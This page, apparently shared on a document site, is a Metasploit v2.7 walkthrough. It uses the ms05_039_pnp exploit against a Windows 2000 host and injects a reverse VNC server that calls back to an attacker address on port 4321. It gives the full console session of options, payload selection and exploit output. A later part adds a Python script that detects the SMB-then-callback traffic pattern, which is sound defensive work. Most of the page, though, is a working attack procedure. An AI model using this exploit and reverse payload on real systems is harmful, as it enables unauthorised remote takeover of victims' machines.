Attack with Metasploit

1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000.
2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server.
3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

Uploaded by Jesus Rmz Peña
Copyright
© Attribution Non-Commercial (BY-NC)

Attack with Metasploit

Take control via VNC without having it installed on either side

Metasploit version: Framework v2.7

Exploit: ms05_039_pnp Microsoft PnP MS05-039 Overflow
Payload: win32_reverse_vncinject Windows Reverse VNC Server Inject

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

msf > use ms05_039_pnp


msf ms05_039_pnp > show options

Exploit Options
===============

  Exploit:   Name      Default   Description
  --------   -------   -------   ---------------------------------------
  required   RHOST               The target address
  required   SMBPIPE   browser   Pipe name: browser, srvsvc, wkssvc
  optional   SMBDOM              The domain for specified SMB username
  required   RPORT     139       The target port
  optional   SMBUSER             The SMB username to connect with
  optional   SMBPASS             The password for specified SMB username

  Target: Target Not Specified

msf ms05_039_pnp > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_adduser                 Windows Execute net user /ADD
  win32_bind                    Windows Bind Shell
  win32_bind_dllinject          Windows Bind DLL Inject
  win32_bind_meterpreter        Windows Bind Meterpreter DLL Inject
  win32_bind_stg                Windows Staged Bind Shell
  win32_bind_stg_upexec         Windows Staged Bind Upload/Execute
  win32_bind_vncinject          Windows Bind VNC Server DLL Inject
  win32_downloadexec            Windows Executable Download and Execute
  win32_exec                    Windows Execute Command
  win32_passivex                Windows PassiveX ActiveX Injection Payload
  win32_passivex_meterpreter    Windows PassiveX ActiveX Inject Meterpreter Payload
  win32_passivex_stg            Windows Staged PassiveX Shell
  win32_passivex_vncinject      Windows PassiveX ActiveX Inject VNC Server Payload
  win32_reverse                 Windows Reverse Shell
  win32_reverse_dllinject       Windows Reverse DLL Inject
  win32_reverse_meterpreter     Windows Reverse Meterpreter DLL Inject
  win32_reverse_stg             Windows Staged Reverse Shell
  win32_reverse_stg_upexec      Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject       Windows Reverse VNC Server Inject

msf ms05_039_pnp > set PAYLOAD win32_reverse_vncinject
PAYLOAD -> win32_reverse_vncinject

msf ms05_039_pnp(win32_reverse_vncinject) > show options

Exploit and Payload Options
===========================

  Exploit:   Name      Default   Description
  --------   -------   -------   ---------------------------------------
  required   RHOST               The target address
  required   SMBPIPE   browser   Pipe name: browser, srvsvc, wkssvc
  optional   SMBDOM              The domain for specified SMB username
  required   RPORT     139       The target port
  optional   SMBUSER             The SMB username to connect with
  optional   SMBPASS             The password for specified SMB username

  Payload:   Name       Default                           Description
  --------   --------   -------------------------------   ----------------------------------
  required   VNCDLL     /home/framework/data/vncdll.dll   The full path the VNC service dll
  required   EXITFUNC   thread                            Exit technique: "process", "thread", "seh"
  required   LHOST                                        Local address to receive connection
  required   AUTOVNC    1                                 Automatically launch vncviewer
  required   VNCPORT    5900                              The local port to use for the VNC proxy
  required   LPORT      4321                              Local port to receive connection

  Target: Target Not Specified

msf ms05_039_pnp(win32_reverse_vncinject) > set RHOST 192.168.202.5
RHOST -> 192.168.202.5

msf ms05_039_pnp(win32_reverse_vncinject) > set RPORT 139
RPORT -> 139

msf ms05_039_pnp(win32_reverse_vncinject) > set LHOST 192.168.202.153
LHOST -> 192.168.202.153

msf ms05_039_pnp(win32_reverse_vncinject) > show targets

Supported Exploit Targets
=========================

  0   Windows 2000 SP0-SP4 English
  1   Windows 2000 SP4 English/French/German/Dutch
  2   Windows 2000 SP4 French
  3   Windows 2000 SP4 Spanish
  4   Windows 2000 SP0-SP4 German
  5   Windows 2000 SP0-SP4 Italian
  6   Windows XP SP1

msf ms05_039_pnp(win32_reverse_vncinject) > set TARGET 0
TARGET -> 0
msf ms05_039_pnp(win32_reverse_vncinject) > exploit

[*] Starting Reverse Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.202.153:4321 <-> 192.168.202.5:1314
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (348170), Please wait...
[*] Upload completed
[*] VNC proxy listening on port 5900...
[*] VNC proxy finished
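The session above leaves a network signature a defender can look for: an inbound SMB connection to TCP 139 on the target (192.168.202.5) from 192.168.202.153, followed seconds later by the target connecting back to that same peer on the payload's LPORT (4321). The Python script below, added here and not part of the original document, flags that pattern in connection logs; the log line format and the 60-second window are assumptions, and the sample log lines are constructed from the addresses in the session.

```python
from collections import defaultdict

SMB_PORTS = {139, 445}   # ports the ms05_039_pnp exploit reaches the target on (the page uses 139)
WINDOW = 60              # seconds between the SMB hit and the callback; assumed value

# Constructed log lines: "<epoch> <src_ip>:<src_port> -> <dst_ip>:<dst_port>".
# Lines 1-2 mirror the session above; lines 3-4 are benign noise (SMB hit, but the
# later outbound connection falls outside the window).
SAMPLE_LOG = """\
1000 192.168.202.153:3456 -> 192.168.202.5:139
1002 192.168.202.5:1314 -> 192.168.202.153:4321
1005 192.168.202.7:40000 -> 192.168.202.5:139
1300 192.168.202.5:1400 -> 192.168.202.7:80
""".splitlines()


def parse_line(line):
    """Split one log line into (timestamp, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _arrow, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return int(ts), sip, int(sport), dip, int(dport)


def find_reverse_callbacks(lines, window=WINDOW):
    """Return one record per host that received an SMB connection from a peer and
    then opened a non-SMB connection back to that same peer within `window` seconds."""
    smb_hits = defaultdict(list)   # (host, peer) -> timestamps of inbound SMB from peer
    findings = []
    for line in lines:
        ts, sip, _sport, dip, dport = parse_line(line)
        if dport in SMB_PORTS:
            smb_hits[(dip, sip)].append(ts)   # dip was contacted over SMB by sip
            continue
        # Outbound, non-SMB: did this host receive SMB from this destination recently?
        recent = [t for t in smb_hits.get((sip, dip), []) if 0 <= ts - t <= window]
        if recent:
            findings.append({
                "victim": sip, "attacker": dip, "callback_port": dport,
                "smb_at": recent[-1], "callback_at": ts,
            })
    return findings


if __name__ == "__main__":
    for f in find_reverse_callbacks(SAMPLE_LOG):
        print(f"{f['victim']} called back to {f['attacker']}:{f['callback_port']} "
              f"{f['callback_at'] - f['smb_at']}s after an inbound SMB connection")
```

The VNC proxy on port 5900 is opened on the attacker's machine (it is a "local" option), so from the target's side the callback to LPORT is the only part of the payload's traffic that a network sensor can see.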
